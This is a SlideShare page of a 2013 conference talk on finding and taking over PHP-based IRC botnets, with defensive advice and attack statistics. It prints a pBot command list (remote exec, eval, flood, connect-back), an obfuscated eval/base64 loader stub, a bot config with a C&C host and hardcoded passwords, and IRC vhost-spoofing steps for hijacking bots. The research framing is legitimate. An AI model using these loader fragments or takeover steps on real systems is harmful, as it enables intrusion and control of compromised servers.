Botnets of the Web How to Hijack One
10 November 2013

Sense of Security Pty Ltd
Sydney
Level 8, 66 King St
Sydney NSW 200...
whois hansv
Hans-Michael Varbaek
• Security Consultant
(aka. PenTester)
• Locksport Wizard
• Captain Obvious
• Community G...
Agenda
1.
2.
3.
4.
5.
6.
7.

Background
Analysis
Live Demo
Protecting Yourself
Statistical Findings
Conclusion
Q&A
Background
Background
Wikipedia’s depiction of botnet infections:
Background
Web-based botnets?
Classic IRC C&C
Typically PHP
 RoR (CVE-2013-0156)
 Sometimes Perl
Attack methods
 Google...
Background
What does it look like when you connect?
08:00 -!- b0yz|43231 [captain@obvious] has joined #b0yz
08:00 -!- Topi...
Background
What does it look like when you connect?
08:00 -!- b0yz|43231 [captain@obvious] has joined #b0yz
08:00 -!- Topi...
Background
Let’s see a /who #b0yz
#b0yz b0yz|43231 H
#b0yz b0yz_JbX H@
#b0yz b0yz]|[8945 H
#b0yz b0yz]|[8273 H
#b0yz [z]uL...
Background
How many are reinfections?
#b0yz b0yz|43231 H
#b0yz b0yz_JbX H@
#b0yz b0yz]|[8945 H
#b0yz b0yz]|[8273 H
#b0yz [...
Background
pBot IRC commands:
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*
*

.die //kill the bot
.restart //restart the bot
.mail ...
Background
pBot IRC commands - that a hijacker would use?
* .die //kill the bot
* .restart //restart the bot
* .mail <to> ...
Analysis
Analysis
Deobfuscation
• Payloads are “heavily obfuscated”
• base64_decode()
• preg_replace()
• str_rot13()
• gzinflate()
...
Analysis
Deobfuscation
GIF89a?????���!�????,???????D?;?
<?php
set_time_limit(0);
error_reporting(0);
$...
Analysis
Modified PHP Decoder (Obfuscated)
Analysis
Modified PHP Decoder (Deobfuscated)
Analysis
Discovered Vulnerabilities
• Hardcoded Passwords
• Insecure hostname authentication
• Insufficient access control...
Analysis
Discovered Vulnerabilities
• Hardcoded Passwords
var $config = array("server"=>"scan.noip.us",
"port"=>"6667",
"p...
Analysis
Discovered Vulnerabilities
• Insecure hostname authentication
var $config = array("server"=>"scan.noip.us",
"port...
Analysis
Insecure hostname authentication
• How easy is it to bypass?
/msg nickserv register 123456 someuser@hushmail.com
...
Analysis
Discovered Vulnerabilities
• Insufficient access control
• Anyone can connect to the IRC server. (Obviously)
• A ...
Analysis
Reoccurring Bugs
Most of these botnets
have no HostAuth set.

Almost all of them use
either pBot or RA1NX.
Source...
Live Demo
Protection against
Automated bot attacks
aka. How not to become a bot
• Stay up to date
• Stop using dynamic require() and include()
• AND require_once and include...
Statistical Findings
and
Conclusions
Statistical Findings
Generic RFI Attacks (On a WordPress Website)
5000
4500
4000
3500

3000
2500
RFI Attacks
2000

1500
10...
Statistical Findings
pBot Attacks (On the same WordPress website)
90

80

70

60

50
Bot Attacks

40

30

20

10

0
Apr-13...
Statistical Findings
RA1NX Attacks (On the same WordPress website)
25

20

15

Bot Attacks
10

5

0
Apr-13

May-13

Jun-13...
Statistical Findings
Period: 28 Jul – 01 Nov 2013
Total RFI Attacks: 257
Unique Payloads: 17

Source: InterN0T

Source: Fo...
Statistical Findings
Period: 28 Jul – 01 Nov 2013
Total RFI Attacks: 257

Source: InterN0T

Source: Forum Application
Uniq...
Conclusion
• RFI Attacks are still occurring (obviously)
• And they are still successful
• But on a smaller scale

• These...
References
Statistics:
http://www.attack-scanner.com/category/attack-trends-2/
Bot Payloads:
https://defense.ballastsecuri...
References
Detailed Information:
https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder
https://defense.ba...
Credits
• Bwall (@bwallHatesTwits)
• DigiP (@xxDigiPxx)
• InterN0T (@InterN0T)

Other credits required by license:
http://...
Thank You!

Questions?
Upcoming SlideShare
Loading in …5
×

Botnets of the Web – How to Hijack One

5,772 views

Published on

A relatively small but also somewhat unknown type of botnets are automatically attacking web servers and joining them together into a classic C&C botnet. These bots are flawed by design and often use code from each other, thus the same types of flaws are consistent among almost all bots encountered. This presentation dives into finding these botnets, what the flaws in these bots are, how to exploit them, and a live demo.

Location: Sunday 10th November 2013 - 16:00 @ The Opera House - Wellington - New Zealand.

Bio:
Hans is a Security Consultant at Sense of Security and is an active part of the penetration testing team. He is an IT security specialist, independent researcher, and penetration tester.

Toolkit: https://github.com/Varbaek/alpha-toolkit
YouTube: http://www.youtube.com/playlist?list=PLIjb28IYMQgqWSjVFsSTT5QY_gPYoynxh
Vimeo: https://vimeo.com/channels/botnetsoftheweb

Published in: Education, Technology
0 Comments
3 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
5,772
On SlideShare
0
From Embeds
0
Number of Embeds
904
Actions
Shares
0
Downloads
96
Comments
0
Likes
3
Embeds 0
No embeds

No notes for slide

Botnets of the Web – How to Hijack One

  1. 1. Botnets of the Web How to Hijack One 10 November 2013 Sense of Security Pty Ltd Sydney Level 8, 66 King St Sydney NSW 2000 Australia Melbourne Level 10, 401 Docklands Dr Melbourne VIC 3008 Australia T: 1300 922 923 T: +61 (0) 2 9290 4444 F: +61 (0) 2 9290 4455 info@senseofsecurity.com.au www.senseofsecurity.com.au ABN: 14 098 237 908
  2. 2. whois hansv Hans-Michael Varbaek • Security Consultant (aka. PenTester) • Locksport Wizard • Captain Obvious • Community Guy
  3. 3. Agenda 1. 2. 3. 4. 5. 6. 7. Background Analysis Live Demo Protecting Yourself Statistical Findings Conclusion Q&A
  4. 4. Background
  5. 5. Background Wikipedia’s depiction of botnet infections:
  6. 6. Background Web-based botnets? Classic IRC C&C Typically PHP  RoR (CVE-2013-0156)  Sometimes Perl Attack methods  Google Dorks  RFI Payloads  Dumb Clients  Archaic, but it works! Walter Pinkman – Breaking Bad
  7. 7. Background What does it look like when you connect? 08:00 -!- b0yz|43231 [captain@obvious] has joined #b0yz 08:00 -!- Topic for #b0yz: /source/includes/load_forum.php?mfh_root_path= Mihalism Multi Forum Host © 2007 08:00 -!- Topic set by b0yz_JbX [] [Sun Dec 25 21:32:45 2011] 08:00 [Users #b0yz] 08:00 [@b0yz_JbX ] [ b0yz]|[1139] [ b0yz]|[2873] [ b0yz]|[6267] [ b0yz]|[7484][ b0yz]|[9542] 08:00 [%abah ] [ b0yz]|[1419] [ b0yz]|[3234] [ b0yz]|[6344] [ b0yz]|[7521] [ ********** ] 08:00 [%VioLa ] [ b0yz]|[1664] [ b0yz]|[3421] [ b0yz]|[6431] [ b0yz]|[7541] [ Loaded ] 08:00 [+_b0yz_ ] [ b0yz]|[1978] [ b0yz]|[3447] [ b0yz]|[6694] [ b0yz]|[8273] [ MiStErluS ] 08:00 [+SiLeT ] [ b0yz]|[2659] [ b0yz]|[5438] [ b0yz]|[6883] [ b0yz]|[8692] [ Security ] 08:00 [ [z]uLva[N]] [ b0yz]|[2858] [ b0yz]|[5541] [ b0yz]|[6972] [ b0yz]|[8945] 08:00 -!- Irssi: #b0yz: Total of 35 nicks [1 ops, 2 halfops, 2 voices, 30 normal] 08:00 -!- Channel #b0yz created Fri Apr 6 07:05:14 2012 08:00 -!- Irssi: Join to #b0yz was synced in 0 secs It looks exactly like a regular IRC C&C!
  8. 8. Background What does it look like when you connect? 08:00 -!- b0yz|43231 [captain@obvious] has joined #b0yz 08:00 -!- Topic for #b0yz: /source/includes/load_forum.php?mfh_root_path= Mihalism Multi Forum Host © 2007 08:00 -!- Topic set by b0yz_JbX [] [Sun Dec 25 21:32:45 2011] 08:00 [Users #b0yz] 08:00 [@b0yz_JbX ] [ b0yz]|[1139] [ b0yz]|[2873] [ b0yz]|[6267] [ b0yz]|[7484][ b0yz]|[9542] 08:00 [%abah ] [ b0yz]|[1419] [ b0yz]|[3234] [ b0yz]|[6344] [ b0yz]|[7521] [ ********** ] 08:00 [%VioLa ] [ b0yz]|[1664] [ b0yz]|[3421] [ b0yz]|[6431] [ b0yz]|[7541] [ Loaded ] 08:00 [+_b0yz_ ] [ b0yz]|[1978] [ b0yz]|[3447] [ b0yz]|[6694] [ b0yz]|[8273] [ MiStErluS ] 08:00 [+SiLeT ] [ b0yz]|[2659] [ b0yz]|[5438] [ b0yz]|[6883] [ b0yz]|[8692] [ Security ] 08:00 [ [z]uLva[N]] [ b0yz]|[2858] [ b0yz]|[5541] [ b0yz]|[6972] [ b0yz]|[8945] 08:00 -!- Irssi: #b0yz: Total of 35 nicks [1 ops, 2 halfops, 2 voices, 30 normal] 08:00 -!- Channel #b0yz created Fri Apr 6 07:05:14 2012 08:00 -!- Irssi: Join to #b0yz was synced in 0 secs It looks exactly like a regular IRC C&C!
  9. 9. Background Let’s see a /who #b0yz #b0yz b0yz|43231 H #b0yz b0yz_JbX H@ #b0yz b0yz]|[8945 H #b0yz b0yz]|[8273 H #b0yz [z]uLva[N] H #b0yz b0yz]|[2659 H #b0yz b0yz]|[9542 H #b0yz VioLa G% #b0yz b0yz]|[6267 H #b0yz b0yz]|[3421 H #b0yz b0yz]|[7541 H #b0yz b0yz]|[6883 H #b0yz b0yz]|[6344 H #b0yz b0yz]|[1419 H #b0yz b0yz]|[5438 H #b0yz b0yz]|[6694 H #b0yz b0yz]|[1664 H #b0yz b0yz]|[1978 H #b0yz b0yz]|[7484 H #b0yz SiLeT H+ #b0yz b0yz]|[3234 H #b0yz b0yz]|[7521 H #b0yz abah Hr% #b0yz b0yz]|[2873 H #b0yz Security H* End of /WHO list 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 captain@obvious [b0yz|43231] Aku@host-79-121-103-71.juropnet.hu [.:|| Pangeran Berkelana ||:.] Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana b0yz@Lovers.Community [-=[ Powered by b0yz ]=-] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.begumonline.com [.:|| Pangeran Berkelana ||:.] Aku@paris078.startdedicated.com [.:|| Pangeran Berkelana ||:.] Aku@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] zx@mx.projectchemical.com [((([D3V_C0])))] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@C015E953.E43244A9.563BB248.IP [.:|| Pangeran Berkelana ||:.] Aku@mail.begumonline.com [.:|| Pangeran Berkelana ||:.] Aku@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@vHost [.:|| Pangeran Berkelana ||:.] Aku@211.234.119.254 [.:|| Pangeran Berkelana ||:.] oYik.a@IRC [Network] ||:.] ||:.] ||:.] ||:.] ||:.]
  10. 10. Background How many are reinfections? #b0yz b0yz|43231 H #b0yz b0yz_JbX H@ #b0yz b0yz]|[8945 H #b0yz b0yz]|[8273 H #b0yz [z]uLva[N] H #b0yz b0yz]|[2659 H #b0yz b0yz]|[9542 H #b0yz VioLa G% #b0yz b0yz]|[6267 H #b0yz b0yz]|[3421 H #b0yz b0yz]|[7541 H #b0yz b0yz]|[6883 H #b0yz b0yz]|[6344 H #b0yz b0yz]|[1419 H #b0yz b0yz]|[5438 H #b0yz b0yz]|[6694 H #b0yz b0yz]|[1664 H #b0yz b0yz]|[1978 H #b0yz b0yz]|[7484 H #b0yz SiLeT H+ #b0yz b0yz]|[3234 H #b0yz b0yz]|[7521 H #b0yz abah Hr% #b0yz b0yz]|[2873 H #b0yz Security H* End of /WHO list 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 captain@obvious [b0yz|43231] Aku@host-79-121-103-71.juropnet.hu [.:|| Pangeran Berkelana ||:.] Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana Aku@rrcs-98-100-234-34.central.biz.rr.com [.:|| Pangeran Berkelana b0yz@Lovers.Community [-=[ Powered by b0yz ]=-] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.begumonline.com [.:|| Pangeran Berkelana ||:.] Aku@paris078.startdedicated.com [.:|| Pangeran Berkelana ||:.] Aku@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] Aku@mail.pcliga.com [.:|| Pangeran Berkelana ||:.] zx@mx.projectchemical.com [((([D3V_C0])))] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] say@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@C015E953.E43244A9.563BB248.IP [.:|| Pangeran Berkelana ||:.] Aku@mail.begumonline.com [.:|| Pangeran Berkelana ||:.] Aku@dns.sifasol.com [.:|| Pangeran Berkelana ||:.] Aku@vHost [.:|| Pangeran Berkelana ||:.] Aku@211.234.119.254 [.:|| Pangeran Berkelana ||:.] oYik.a@IRC [Network] ||:.] ||:.] ||:.] ||:.] ||:.]
  11. 11. Background pBot IRC commands: * * * * * * * * * * * * * * * * * * * .die //kill the bot .restart //restart the bot .mail <to> <from> <subject> <msg> //send an email .dns <IP|HOST> //dns lookup .download <URL> <filename> //download a file .exec <cmd> // uses exec() //execute a command .sexec <cmd> // uses shell_exec() //execute a command .cmd <cmd> // uses popen() //execute a command .info //get system information .php <php code> // uses eval() //execute php code .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack .raw <cmd> //raw IRC command .rndnick //change nickname .pscan <host> <port> //port scan .safe // test safe_mode (dvl) .inbox <to> // test inbox (dvl) .conback <ip> <port> // conect back (dvl) .uname // return shell's uname using a php function (dvl)
  12. 12. Background pBot IRC commands - that a hijacker would use? * .die //kill the bot * .restart //restart the bot * .mail <to> <from> <subject> <msg> //send an email * .dns <IP|HOST> //dns lookup * .download <URL> <filename> //download a file * .exec <cmd> // uses exec() //execute a command * .sexec <cmd> // uses shell_exec() //execute a command * .cmd <cmd> // uses popen() //execute a command * .info //get system information * .php <php code> // uses eval() //execute php code … [TRUNCATED] Undocumented Feature: * .system <cmd> // uses system() //execute a command
  13. 13. Analysis
  14. 14. Analysis Deobfuscation • Payloads are “heavily obfuscated” • base64_decode() • preg_replace() • str_rot13() • gzinflate() • eval() • Variable names ($llll = $lll.$lllll;)
  15. 15. Analysis Deobfuscation GIF89a?????���!�????,???????D?;? <?php set_time_limit(0); error_reporting(0); $recky = '7T14SuLKst90rfkPeg54A3uQp84eHVoBWcfc[TRUNCATED]=='; eval(gzinflate(str_rot13(base64_decode($recky)))); ?> Method 1: Change eval() to print(), continue until plain text is recovered. Method 2: Use BallastSec’s / Bwall’s decoder!
  16. 16. Analysis Modified PHP Decoder (Obfuscated)
  17. 17. Analysis Modified PHP Decoder (Deobfuscated)
  18. 18. Analysis Discovered Vulnerabilities • Hardcoded Passwords • Insecure hostname authentication • Insufficient access control Known Vulnerabilities: - pBot RCE (HostAuth *) - RA1NX Auth Bypass
  19. 19. Analysis Discovered Vulnerabilities • Hardcoded Passwords var $config = array("server"=>"scan.noip.us", "port"=>"6667", "pass"=>"", // Server password "prefix"=>"puto", "chan"=>"#ath0", "key"=>"id", // Channel password "modes"=>"+p", "password"=>"id", // Bot password "trigger"=>, "hostauth"=>"sHoOcK" // Host Auth );
  20. 20. Analysis Discovered Vulnerabilities • Insecure hostname authentication var $config = array("server"=>"scan.noip.us", "port"=>"6667", "pass"=>"", // Server password "prefix"=>"puto", "chan"=>"#ath0", "key"=>"id", // Channel password "modes"=>"+p", "password"=>"id", // Bot password "trigger"=>, "hostauth"=>"sHoOcK" // Host Auth );
  21. 21. Analysis Insecure hostname authentication • How easy is it to bypass? /msg nickserv register 123456 someuser@hushmail.com /msg nickserv confirm [TOKEN] A: Needs confirmation /msg hostserv request target.vhost.tld /msg hostserv on B: Does usually not need any confirmation /join #vhost !vhost target.vhost.tld
  22. 22. Analysis Discovered Vulnerabilities • Insufficient access control • Anyone can connect to the IRC server. (Obviously) • A centralised botnet is a flawed design model. The Solution: P2P Botnets
  23. 23. Analysis Reoccurring Bugs Most of these botnets have no HostAuth set. Almost all of them use either pBot or RA1NX. Source code is rarely modified or improved. Could a cat do it better? Most likely.
  24. 24. Live Demo
  25. 25. Protection against Automated bot attacks
  26. 26. aka. How not to become a bot • Stay up to date • Stop using dynamic require() and include() • AND require_once and include_once • Use a web application firewall • Check out BallastSec’s tools (PHP) • Custom Apps? • Secure Development Life-Cycle
  27. 27. Statistical Findings and Conclusions
  28. 28. Statistical Findings Generic RFI Attacks (On a WordPress Website) 5000 4500 4000 3500 3000 2500 RFI Attacks 2000 1500 1000 500 0 Nov 01-14- Nov 15-30- Dec 01-152012 2012 2012 Dec 15-312012 Jan 01-152013 Jan 15-312013 Feb 01-152013 Primary Source: http://www.attack-scanner.com/category/attack-trends-2/ Feb 15-28- Mar 01-15- Mar 15-312013 2013 2013
  29. 29. Statistical Findings pBot Attacks (On the same WordPress website) 90 80 70 60 50 Bot Attacks 40 30 20 10 0 Apr-13 May-13 Jun-13 Jul-13 Aug-13 Primary Source: https://defense.ballastsecurity.net/decoding/rss/pbot.rss Sep-13 Oct-13
  30. 30. Statistical Findings RA1NX Attacks (On the same WordPress website) 25 20 15 Bot Attacks 10 5 0 Apr-13 May-13 Jun-13 Jul-13 Aug-13 Primary Source: https://defense.ballastsecurity.net/decoding/rss/ra1nx.rss Sep-13 Oct-13
  31. 31. Statistical Findings Period: 28 Jul – 01 Nov 2013 Total RFI Attacks: 257 Unique Payloads: 17 Source: InterN0T Source: Forum Application Payload Domains: 14 Payload IP Addresses: 13
  32. 32. Statistical Findings Period: 28 Jul – 01 Nov 2013 Total RFI Attacks: 257 Source: InterN0T Source: Forum Application Unique Attacker IPs: 23 Unique Attacker Domains: 19
  33. 33. Conclusion • RFI Attacks are still occurring (obviously) • And they are still successful • But on a smaller scale • These botnets are small • Usually between 5-20 hosts • It’s easy to hijack them • Requires minimal analysis • Legal implications
  34. 34. References Statistics: http://www.attack-scanner.com/category/attack-trends-2/ Bot Payloads: https://defense.ballastsecurity.net/decoding/index.php http://www.irongeek.com/i.php?page=webshells-and-rfis Papers: http://www.exploit-db.com/wp-content/themes/exploit/docs/19032.pdf http://www.exploit-db.com/wp-content/themes/exploit/docs/19395.pdf Videos: http://www.youtube.com/watch?v=HAZdpP5M1qc http://www.youtube.com/watch?v=JrA_axdQj1k
  35. 35. References Detailed Information: https://defense.ballastsecurity.net/wiki/index.php/RFI_Payload_Decoder https://defense.ballastsecurity.net/wiki/index.php/Attack_Analysis https://defense.ballastsecurity.net/wiki/index.php/STUNSHELL https://defense.ballastsecurity.net/wiki/index.php/V0pCr3w_shell Known Exploits: http://www.exploit-db.com/exploits/24883/ http://www.exploit-db.com/exploits/20168/ http://www.exploit-db.com/exploits/24905/ Tools: http://www.irongeek.com/downloads/grepforrfi.txt https://github.com/bwall/PHP-RFI-Payload-Decoder http://sourceforge.net/p/ra1nxingbots/wiki/Home/
  36. 36. Credits • Bwall (@bwallHatesTwits) • DigiP (@xxDigiPxx) • InterN0T (@InterN0T) Other credits required by license: http://www.intechopen.com/books/advances-in-datamining-knowledge-discovery-and-applications/botnetdetection-enhancing-analysis-by-using-data-miningtechniques
  37. 37. Thank You! Questions?

×